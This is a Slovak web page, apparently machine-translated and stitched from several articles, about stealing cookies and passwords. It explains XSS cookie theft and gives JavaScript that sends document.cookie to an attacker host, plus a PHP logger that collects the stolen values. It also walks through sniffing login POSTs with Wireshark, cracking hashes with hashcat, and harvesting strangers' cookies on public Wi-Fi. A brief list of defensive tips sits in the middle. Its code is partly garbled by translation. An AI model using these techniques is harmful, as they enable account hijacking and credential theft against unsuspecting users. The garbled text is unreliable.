Spôsoby kradnutia cookies. Spôsoby kradnutia súborov cookie Stiahnite si program na kradnutie súborov cookie

Cookies - informácie vo forme textového súboru uloženého webovou stránkou na počítači užívateľa. Obsahuje autentifikačné údaje (login / heslo, ID, telefónne číslo, adresa schránky), užívateľské nastavenia, stav prístupu. Uložené v profile prehliadača.

Hackovanie cookies Je krádež (alebo „unesenie“) relácie návštevníka webového zdroja. Uzavreté informácie sa sprístupnia nielen odosielateľovi a príjemcovi, ale aj tretej strane – osobe, ktorá odpočúvala.

Nástroje a techniky na lámanie cookies

Okrem zručností, šikovnosti a vedomostí majú počítačoví zlodeji, podobne ako ich kolegovia v reálnom živote, samozrejme aj svoje nástroje – akýsi arzenál hlavných kľúčov a sond. Poďme sa pozrieť na niektoré z najpopulárnejších hackerských trikov, ktoré používajú na získavanie cookies od širokej verejnosti na internete.

Snifferi

Špeciálne programy na monitorovanie a analýzu sieťovej prevádzky. Ich názov pochádza z anglického slovesa „sniff“ doslova „vyňuchať“ prenášané pakety medzi uzlami.

Útočníci však používajú sniffer na zachytenie údajov relácie, správ a iných dôverných informácií. Objektmi ich útokov sú najmä nezabezpečené siete, kde sa cookies odosielajú v otvorenej HTTP relácii, teda prakticky nie sú šifrované. (Verejné Wi-Fi je v tomto smere najzraniteľnejšie.)

Na vloženie snifferu do internetového kanála medzi stránkou používateľa a webovým serverom sa používajú nasledujúce metódy:

• "Počúvanie" sieťových rozhraní (rozbočovače, prepínače);
• vetvenie a kopírovanie prevádzky;
• pripojenie k medzere v sieťovom kanáli;
• analýzu pomocou špeciálnych útokov, ktoré presmerujú prevádzku obete na sniffer (MAC-spoofing, IP-spoofing).

XSS je skratka pre Cross Site Scripting. Používa sa na útoky na webové stránky s cieľom ukradnúť používateľské údaje.

Ako funguje XSS je nasledovné:

• útočník vloží škodlivý kód (špeciálny skrytý skript) na webovú stránku, fórum alebo správu (napríklad pri chatovaní na sociálnej sieti);
• obeť navštívi infikovanú stránku a aktivuje nainštalovaný kód na svojom PC (klikne, nasleduje odkaz atď.);
• spustený škodlivý kód „extrahuje“ dôverné údaje používateľa z prehliadača (najmä súbory cookie) a odošle ich na webový server útočníka.

S cieľom „implantovať“ softvér XSS hackeri využívajú všetky druhy zraniteľností vo webových serveroch, online službách a prehliadačoch.

Všetky zraniteľnosti XSS sú rozdelené do dvoch typov:

• Pasívne. Útok sa dosiahne vyžiadaním konkrétneho skriptu na webovej stránke. Škodlivý kód je možné zadať v rôznych formách na webovej stránke (napríklad do vyhľadávacieho panela). Najcitlivejšie na pasívne XSS sú zdroje, ktoré nemajú filtrovanie značiek HTML, keď prichádzajú údaje;
• Aktívne. Nachádza sa priamo na serveri. A spúšťajú sa v prehliadači obete. Aktívne ich využívajú podvodníci vo všetkých druhoch blogov, rozhovorov a informačných kanálov.

Hackeri starostlivo maskujú svoje XSS skripty, aby obeť nič netušila. Zmenia príponu súboru, rozdajú kód ako obrázok, motivujú nasledovať odkaz, upútajú zaujímavým obsahom. Výsledkom je, že používateľ PC, ktorý nezvládol svoju vlastnú zvedavosť, vlastnou rukou (kliknutím myšou) odošle súbory cookie relácie (s prihlasovacím menom a heslom!) autorovi skriptu XSS - počítačovému zloduchovi.

Nahradenie cookies

Všetky cookies sú uložené a odoslané na webový server (z ktorého „prišli“) bez akýchkoľvek zmien – v ich pôvodnej podobe – s rovnakými hodnotami, reťazcami a ďalšími údajmi. Zámerná úprava ich parametrov sa nazýva spoofing cookies. Inými slovami, keď je súbor cookie nahradený, útočník si len zbožne želá. Napríklad pri platbe v internetovom obchode sa suma platby v súbore cookie mení smerom nadol – dochádza tak k „úspore“ na nákupoch.

Ukradnuté cookies pre reláciu na sociálnej sieti z cudzieho účtu sa „vložia“ do inej relácie a na inom PC. Vlastník ukradnutých cookies získa úplný prístup k účtu obete (korešpondencia, obsah, nastavenia stránky), pokiaľ je na svojej stránke.

Súbory cookie sa „upravujú“ pomocou:

• funkcie „Spravovať súbory cookie ...“ v prehliadači Opera;
• Doplnky Cookies Manager a Advanced Cookie Manager pre FireFox;
• nástroje IECookiesView (iba Internet Explorer);
• textový editor, ako je AkelPad, NotePad alebo Windows Notepad.

Fyzický prístup k údajom

Veľmi jednoduchá implementačná schéma, pozostáva z niekoľkých krokov. Je to však účinné iba vtedy, ak je počítač obete s otvorenou reláciou, napríklad Vkontakte, ponechaný bez dozoru (a dostatočne dlho!):

1. Do panela s adresou prehliadača sa zadáva funkcia javascript, ktorá zobrazuje všetky uložené súbory cookie.
2. Po stlačení "ENTER" sa všetky objavia na stránke.
3. Cookies sa skopírujú, uložia do súboru a potom sa prenesú na USB flash disk.
4. Na inom počítači sa súbory cookie nahradia v novej relácii.
5. Otvorí sa prístup k účtu obete.

Hackeri spravidla používajú vyššie uvedené nástroje (+ ďalšie) v kombinácii (keďže úroveň ochrany na mnohých webových zdrojoch je dosť vysoká), ako aj oddelene (keď sú používatelia príliš naivní).

XSS + sniffer

1. Vytvorí sa XSS skript, ktorý špecifikuje adresu online sniffera (vlastného výrobcu alebo konkrétnej služby).
2. Škodlivý kód je uložený s príponou .img (formát obrázka).
3. Potom sa tento súbor nahrá na webovú stránku, do chatu alebo do súkromnej správy - kde bude útok vykonaný.
4. Pozornosť užívateľa púta vytvorená „pasca“ (tu vstupuje do platnosti sociálne inžinierstvo).
5. Ak sa pasca spustí, sniffer zachytí súbory cookie z prehliadača obete.
6. Cracker otvorí protokoly sniffer a získa ukradnuté cookies.
7. Ďalej vykoná substitúciu na získanie práv vlastníka účtu pomocou vyššie uvedených nástrojov.

Ochrana súborov cookie pred hackermi

1. Použite šifrované pripojenie (pomocou vhodných protokolov a metód zabezpečenia).
2. Neodpovedajte na pochybné odkazy, obrázky, lákavé ponuky na zoznámenie sa s „novým slobodným softvérom“. Najmä od cudzích ľudí.
3. Používajte iba dôveryhodné webové zdroje.
4. Ukončite autorizovanú reláciu stlačením tlačidla „Ukončiť“ (a nielen zatvorením karty!). Najmä ak bol účet prihlásený nie z osobného počítača, ale napríklad z počítača v internetovej kaviarni.
5. Nepoužívajte funkciu prehliadača „Uložiť heslo“. Uložené prihlasovacie údaje dramaticky zvyšujú riziko krádeže. Nebuďte leniví, nenechajte si na začiatku každej relácie pár minút času na zadanie hesla a prihlásenia.
6. Po surfovaní na webe – návšteve sociálnych sietí, fór, chatov, stránok – odstráňte uložené súbory cookie a vymažte vyrovnávaciu pamäť prehliadača.
7. Pravidelne aktualizujte prehliadače a antivírusový softvér.
8. Používajte rozšírenia prehliadača, ktoré chránia pred útokmi XSS (napríklad NoScript pre FF a Google Chrome).
9. Pravidelne na účtoch.

A hlavne – nestrácajte ostražitosť a pozornosť pri oddychu či surfovaní na internete!

čo je to cookie?

Existuje mechanizmus, ktorý umožňuje http-serveru uložiť niektoré textové informácie do počítača používateľa a potom k nim pristupovať. Táto informácia sa nazýva cookie. V skutočnosti je každý súbor cookie pár: názov parametra a jeho hodnota. Každému súboru cookie je tiež priradená doména, do ktorej patrí. Z bezpečnostných dôvodov má server http vo všetkých prehliadačoch povolený prístup iba k súborom cookie pre svoju doménu. Okrem toho môžu mať súbory cookie dátum vypršania platnosti, potom budú uložené v počítači do tohto dátumu, aj keď zatvoríte všetky okná prehliadača.

Prečo sú súbory cookie dôležité?

Vo všetkých systémoch s viacerými používateľmi sa na identifikáciu používateľa používajú súbory cookie. Skôr aktuálne pripojenie používateľa k službe, relácia používateľa. Ak niekto spozná vaše cookies, môže sa prihlásiť vo vašom mene. Pretože v súčasnosti veľmi málo internetových zdrojov kontroluje zmenu IP adresy počas jednej užívateľskej relácie.

Ako môžem zmeniť alebo nahradiť súbor cookie?

Vývojári prehliadačov neposkytujú vstavané nástroje na úpravu súborov cookie. Môžete si však vystačiť s bežným poznámkovým blokom.

Krok 1: vytvorte textový súbor s textom

Editor databázy Registry systému Windows, verzia 5.00



@ = "C: \\ IE_ext.htm"

Uložíme ho pod názvom IE_ext.reg

Krok 2: Pomocou vytvoreného súboru pridajte zmeny do registra Windows.

Krok 3: vytvorte textový súbor s textom

< script jazyk = "javascript">
external.menuArguments.clipboardData.setData ("Text", externe.menuArgumenty.document.cookie);

externé.menuArgumenty.dokument.cookie = "názov testu = testovacia hodnota; cesta = /; doména = testovacia doména.ru";
upozornenie (externé.menuArgumenty.dokument.cookie);

Uložte ho pod názvom C: \ IE_ext.htm

Krok 4: Prejdeme na webovú stránku, ktorá nás zaujíma.

Krok 5: Kliknite pravým tlačidlom myši na prázdne miesto na stránke a vyberte položku ponuky "Práca so súbormi cookie"... Umožňujeme prístup do schránky. Vaše súbory cookie pre túto stránku sa zobrazia v schránke. Môžete vložiť ich poznámkový blok a uvidíte.

Krok 6: Ak chcete zmeniť niektoré súbory cookie, upravte súbor C: \ IE_ext.htm a nahraďte ho testname na názov súboru cookie, testovacia hodnota- na jeho hodnote, testdomain.ru- na doménu lokality. V prípade potreby pridajte viac podobných riadkov. Pre uľahčenie kontroly som pridal výstup aktuálnych cookies pred a po zmene skriptu: upozornenie (externé.menuArgumenty.dokument.cookie);

Krok 7: Znova vykonajte krok 5 a potom obnovte stránku.

Zrátané a podčiarknuté: na túto webovú stránku prejdeme s aktualizovanými súbormi cookie.

Ako ukradnúť cookie pomocou JavaScriptu?

Ak by sa útočníkovi podarilo nájsť spôsob, ako spustiť ľubovoľný JavaScript na počítači obete, mohol by si veľmi ľahko prečítať aktuálne súbory cookie. Príklad:

var str = document.cookie;

Bude ich však môcť preniesť na svoju stránku, pretože, ako som už spomenul, skript JavaScript nebude môcť pristupovať na stránku umiestnenú v inej doméne bez dodatočného potvrdenia? Ukázalo sa, že skript JavaScript môže načítať ľubovoľný obrázok umiestnený na ľubovoľnom serveri http. Zároveň na tento obrázok pošlite akékoľvek textové informácie v žiadosti o stiahnutie. Príklad: http://hackersite.ru/xss.jpg?text_info Preto, ak spustíte tento kód:

var img = nový obrázok ();

img.src = "http://hackersite.ru/xss.jpg?"+ encodeURI (document.cookie);

potom sa cookie objaví v žiadosti o stiahnutie „obrázku“ a „prejde“ k útočníkovi.

Ako riešiť takéto žiadosti o nahranie „obrázku“?

Útočníkovi stačí nájsť hosting s podporou php a umiestniť tam kód takto:

$ uid = urldecode ($ _ SERVER ["QUERY_STRING"]);
$ fp = fopen ("log.txt", "a");
fputs ($ fp, "$ uid \ n");
fclose ($ fp);
?>

Potom sa všetky parametre požiadaviek na tento skript uložia do súboru log.txt... Zostáva iba v predtým popísanom skripte JavaScript nahradiť http://hackersite.ru/xss.jpg na cestu k danému php skriptu.

Výsledok

Ukázal som len najjednoduchší spôsob, ako využiť zraniteľnosti XSS. Dokazuje to však, že prítomnosť aspoň jednej takejto zraniteľnosti na internetovej stránke s viacerými používateľmi môže útočníkovi umožniť využívať jej zdroje vo vašom mene.

Všimli ste si, že pri návrate na stránku, ktorú ste už navštívili, vás stránka rozpozná a otvorí sa s nastaveniami, ktoré ste použili naposledy? Áno a dosť často? Môžu za to súbory cookie, ktoré uchovávajú informácie o návštevníkoch ako prihlasovacie meno, heslo, ID relácie a ďalšie premenné potrebné na identifikáciu návštevníka a zobrazenie obsahu stránky podľa preferencií používateľa, ktoré si vybral pri poslednej návšteve zdroja. Program WebCookiesSniffer zobrazí používateľovi súbory cookie a ich obsah stránok, ktoré si používateľ prezerá v prehliadači.

Prezeranie súborov cookie

Otvoríte webovú stránku a WebCookiesSniffer zachytí súbory cookie v reálnom čase. Pomôcka pridá všetky zachytené súbory cookie do tabuľky, v ktorej sú uložené údaje o hostiteľovi, ceste požiadavky, celkovej dĺžke súboru cookie, počte premenných v súbore cookie a samotný súbor cookie s názvami premenných a hodnotami. Zhromaždené informácie o súboroch cookie WebCookiesSniffer môže uložiť do textového súboru. Program má tiež schopnosť generovať HTML správu pre všetky alebo vybrané súbory cookie. Aby program fungoval, musíte nainštalovať ovládač WinPcap (je súčasťou archívu s WebCookiesSniffer). Ak chcete nastaviť jazyk programu WebCookiesSniffer do ruštiny, skopírujte súbor WebCookiesSniffer_lng.ini (tiež zahrnutý v archíve) do adresára pomôcky.

Snímky obrazovky WebCookiesSniffer

Mnohí používatelia si ani neuvedomujú, že vyplnením prihlasovacieho mena a hesla pri registrácii alebo autorizácii na uzavretom internetovom zdroji a stlačením ENTER sa tieto údaje dajú ľahko zachytiť. Veľmi často sa prenášajú cez sieť v nechránenej forme. Ak teda stránka, na ktorú sa pokúšate prihlásiť, používa protokol HTTP, potom je veľmi jednoduché zachytiť túto komunikáciu, analyzovať ju pomocou Wireshark a potom pomocou špeciálnych filtrov a programov nájsť a dešifrovať heslo.

Najlepšie miesto na zachytenie hesiel je v jadre siete, kde prevádzka všetkých používateľov smeruje na uzavreté zdroje (napríklad pošta) alebo pred smerovač na prístup na internet pri registrácii s externými zdrojmi. Nastavíme zrkadlo a sme pripravení cítiť sa ako hacker.

Krok 1. Nainštalujte a spustite Wireshark na zachytenie prevádzky

Niekedy stačí vybrať len rozhranie, cez ktoré plánujeme zachytávať návštevnosť a kliknúť na tlačidlo Štart. V našom prípade robíme zachytávanie cez bezdrôtovú sieť.

Začalo sa zachytávanie dopravy.

Krok 2. Filtrovanie zachytenej návštevnosti POST

Otvoríme prehliadač a pokúsime sa prihlásiť do akéhokoľvek zdroja pomocou používateľského mena a hesla. Po dokončení procesu autorizácie a otvorení stránky zastavíme zachytávanie návštevnosti vo Wiresharku. Potom otvorte analyzátor protokolu a zobrazte veľký počet paketov. Práve v tejto fáze to väčšina IT profesionálov vzdáva, pretože nevedia, čo robiť ďalej. Vieme však a zaujímajú nás konkrétne balíčky, ktoré obsahujú POST dáta, ktoré sa generujú na našom lokálnom počítači pri vypĺňaní formulára na obrazovke a sú odoslané na vzdialený server, keď kliknete na tlačidlo „Prihlásiť sa“ alebo „Autorizácia“ v prehliadač.

Zavedenie špeciálneho filtra do okna na zobrazenie zachytených paketov: http.žiadosť.metóda == “Zverejniť

A namiesto tisícky balíčkov vidíme len jeden s údajmi, ktoré hľadáme.

Krok 3. Nájdite používateľské meno a heslo

Rýchle kliknutie pravým tlačidlom myši a výber položky z ponuky Sledujte TCP Steam

Potom sa v novom okne objaví text, ktorý v kóde obnoví obsah stránky. Nájdite polia „heslo“ a „používateľ“, ktoré zodpovedajú heslu a používateľskému menu. V niektorých prípadoch budú obe polia ľahko čitateľné a nebudú ani zašifrované, ale ak sa snažíme zachytiť návštevnosť pri prístupe k veľmi známym zdrojom, ako sú Mail.ru, Facebook, Vkontakte atď., Heslo bude zakódované. :

HTTP / 1.1 302 Nájdených

Server: Apache / 2.2.15 (CentOS)

X-Powered-By: PHP / 5.3.3

P3P: CP = "NOI ADM DEV PSAi COM NAV NAŠE OTRo STP IND DEM"

Set-Cookie: heslo = ; platnosť končí = štvrtok, 7. novembra 2024 23:52:21 GMT; cesta = /

Miesto: login.php

Obsah – dĺžka: 0

Pripojenie: zatvorte

Content-Type: text / html; znaková sada = UTF-8

Takže v našom prípade:

Používateľské meno: networkguru

heslo:

Krok 4. Určenie typu kódovania na dešifrovanie hesla

Ideme napríklad na stránku http://www.onlinehashcrack.com/hash-identification.php#res a do okna identifikácie zadáme svoje heslo. Dostal som zoznam kódovacích protokolov v poradí podľa priority:

Krok 5. Dešifrovanie hesla používateľa

V tejto fáze môžeme použiť pomôcku hashcat:

~ # hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Na výstupe sme dostali dešifrované heslo: simplepassword

Pomocou Wireshark teda môžeme nielen riešiť problémy s prevádzkou aplikácií a služieb, ale tiež sa vyskúšať ako hacker, zachytávajúci heslá, ktoré používatelia zadávajú do webových formulárov. Môžete tiež zistiť heslá do poštových schránok používateľov pomocou jednoduchých filtrov na zobrazenie:

• Protokol POP a filter vyzerá takto: pop.request.command == "USER" || pop.request.command == "PASS"
• IMAP a filter budú: imap.request obsahuje "login"
• SMTP a budete musieť zadať nasledujúci filter: smtp.req.command == "AUTH"

a serióznejšie nástroje na dešifrovanie kódovacieho protokolu.

Krok 6. Čo ak je prenos šifrovaný a používa HTTPS?

Existuje niekoľko možností, ako odpovedať na túto otázku.

Možnosť 1. Pripojiť, aby ste odpojili spojenie medzi používateľom a serverom a zachytili prevádzku v momente nadviazania spojenia (SSL Handshake). Po vytvorení spojenia môžete zachytiť kľúč relácie.

Možnosť 2. Prenos HTTPS môžete dešifrovať pomocou súboru denníka kľúča relácie zaznamenaného prehliadačom Firefox alebo Chrome. Ak to chcete urobiť, prehliadač musí byť nakonfigurovaný tak, aby zapisoval tieto šifrovacie kľúče do súboru denníka (príklad založený na FireFoxe) a mali by ste získať tento súbor denníka. V podstate musíte ukradnúť súbor kľúča relácie z pevného disku iného používateľa (čo je nezákonné). Potom zachyťte prenos a použite výsledný kľúč na jeho dešifrovanie.

Objasnenie. Hovoríme o webovom prehliadači osoby, ktorá sa snaží ukradnúť heslo. Ak máme na mysli dešifrovanie našej vlastnej HTTPS prevádzky a chceme si to precvičiť, tak táto stratégia bude fungovať. Ak sa pokúšate dešifrovať prenos HTTPS iných používateľov bez prístupu k ich počítačom, nebude to fungovať – ide o šifrovanie aj súkromie.

Po prijatí kľúčov pre možnosť 1 alebo 2 ich musíte zaregistrovať vo WireShark:

1. Prejdite do ponuky Upraviť - Predvoľby - Protokoly - SSL.
2. Nastavte príznak "Znovu zostaviť záznamy SSL zahŕňajúce viacero segmentov TCP".
3. "Zoznam RSA kľúčov" a kliknite na Upraviť.
4. Do všetkých polí zadáme údaje a zapíšeme cestu do súboru s kľúčom

Dobrý deň, tento krátky článok, skôr aj krátky popis, by som rád venoval najjednoduchšiemu spôsobu zachytávania cookies na wi-fi sieti. Čo sú cookies a prečo sú potrebné, tu vám nepoviem, či má človek myšlienku zachytiť „pečený tovar“; na bezdrôtovej sieti by podľa mňa mal vedieť, čo to je a prečo to potrebuje. Môžem povedať len jednu vec, pomocou týchto súborov môžete získať prístup k účtom iných ľudí na rôznych stránkach, ktoré vyžadujú, aby používatelia prešli procesom autentifikácie (napríklad mail.ru, vkontakte.ru atď.).

Tak poďme na to. Najprv musíme nájsť samotnú bezdrôtovú sieť s otvorenou bránou na prístup na internet a je žiaduce, aby táto sieť mala veľa klientov. Vhodná je napríklad akákoľvek sieť vo veľkých nákupných centrách, na letiskách, v rôznych kaviarňach, na takýchto miestach ľudia zvyčajne využívajú wi-fi prístup na internet, na čítanie pošty, kontrolu účtov na rôznych zoznamkách, prezeranie LiveJournal a všetky druhy fór. . To je všetko, čo potrebujeme. Po rozhodnutí o výbere umiestnenia siete, po preštudovaní konkrétnych hodín maximálneho počtu klientov, prejdeme priamo k nepriateľským akciám. Na to potrebujeme notebook s wi-fi adaptérom a určitým súborom programov. V mojom prípade som použil notebook Acer Aspire 3610, klientskú wi-fi kartu D-Link DWL G650 a nainštalovaný BackTrack3.

Odporúčam vám používať tento OS, pretože už obsahuje celú sadu programov, ktoré môžete potrebovať, a najdôležitejšou výhodou je, že nemusíte inštalovať Backtrack na pevný disk, tento OS môžete spustiť priamo z CD. -disk alebo flash disk.

Teraz prejdime k požadovanému softvéru. Použil som kismet na detekciu sietí a WifiZoo na zachytávanie cookies. Podrobne sa zastavím pri druhom programe. WifiZoo je pasívny ethernetový skener a zhromažďuje pomerne veľa užitočných informácií, ako napríklad: pop3, smtp traffic, http cookies / authinfo, msn, ftp poverenia, telnet sieťová prevádzka, nbt atď. Jedinou nevýhodou tohto programu je nedostatok režimu preskakovania kanálov, WifiZoo iba počúva bezdrôtové rozhranie a nemôže takpovediac preskakovať z kanála na kanál. Túto nevýhodu ale kompenzuje iný program Kismet, ktorý tento režim podporuje. Na spustenie WifiZoo potrebujete:

• pytón
• scapy
• Kismet

Takže spustíme program, najprv spustíme Kismet, aby sme podporili režim preskakovania kanálov, potom spustíme priamo WifiZoo, mali by ste vidieť okno ako toto:

Teraz už ostáva len sedieť a čakať kým niečo zachytíte, všetko čo program zachytí nájdete v logoch, ktoré sa nachádzajú v adresári s programom / logs/. Môžete tiež spustiť rozhranie GUI, ktoré sa automaticky zvýši na http pri 127.0.0.1:8000

Nebudem písať o všetkých funkciách tohto úžasného programu, myslím, že na ostatné možnosti prídete sami, a keďže nás v súčasnosti zaujímajú iba súbory cookie. Kliknite na odkaz s názvom cookies a pozrite sa, čo sme zachytili: